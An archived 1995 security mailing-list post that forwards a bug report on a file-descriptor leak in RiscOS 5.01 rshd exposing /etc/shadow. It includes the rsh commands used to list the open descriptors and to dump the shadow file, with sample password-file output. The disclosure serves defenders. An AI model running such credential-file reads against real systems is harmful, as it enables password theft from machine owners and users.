[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    RiscOS rsh exploit
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-08-14 5:43:21
[Download RAW message or body]


Date:    Fri, 11 Aug 1995 16:20:33 -0500
From:    Jeremy Fitzhardinge <jeremy@suede.sw.oz.au>
Subject: BUG (and exploit): RiscOS 5.01 rshd has FD leaks...

Hi all,

When rsh'ing to a RiscOS 5.01 machine, the process being run has a file
descriptor open RO on the shadow password file.  A simple program to
seek it back to 0 and copy will reveal the encrypted passwords to
anyone who can rsh to the machine.

suite is a Mips RiscOS 5.01 machine; suede is a Solaris box

: suite:4; ls -li /etc/shadow
  4409 -r--------  1 root         4072 Aug 11 08:48 /etc/shadow

: suede:21; rsh suite t/openfd
21 Dev (33, 0), ino 2679, type character special
20 Dev (33, 0), ino 2679, type character special
8 Dev (255, 255), ino 13566, type FIFO
7 Dev (33, 0), ino 4409, type regular file      *****
4 Dev (33, 0), ino 4409, type regular file      *****
2 Dev (255, 255), ino 13566, type FIFO
1 Dev (0, 0), ino 0, type Unknown
Numeric type: 0
0 Dev (0, 0), ino 0, type Unknown
Numeric type: 0

(seek0 just seeks its stdin to offset 0)
: suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
root:oHnoyOuDOnt:9334::::::
setup:*NOLOGIN*:8603::::::
sysadm:*NOLOGIN*:8603::::::
daemon:*NOLOGIN*:8603::::::
bin:*NOLOGIN*:8603::::::
...


I'm curious about the pipes as well; what are they to?  I think the "unknown"
file descriptors are sockets; fstat doesn't seem to cope with them.

        J

[prev in list] [next in list] [prev in thread] [next in thread]